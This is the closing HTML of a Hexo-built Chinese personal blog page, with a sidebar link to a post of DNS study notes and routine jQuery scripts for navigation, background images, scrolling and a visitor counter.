href="/2017/11/07/%E7%94%B1%E4%B8%80%E9%81%93%E9%A2%98%E7%9B%AE%E5%BC%95%E5%8F%91%E7%9A%84DNS%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">由一道题目引发的DNS学习笔记</a></li></ul>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2020 Fish_o0O
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo &nbsp;&nbsp;</a><a href="https://github.com/maochunguang" target="_blank">Blog</a> by tommy
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>


<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 3;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>






<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>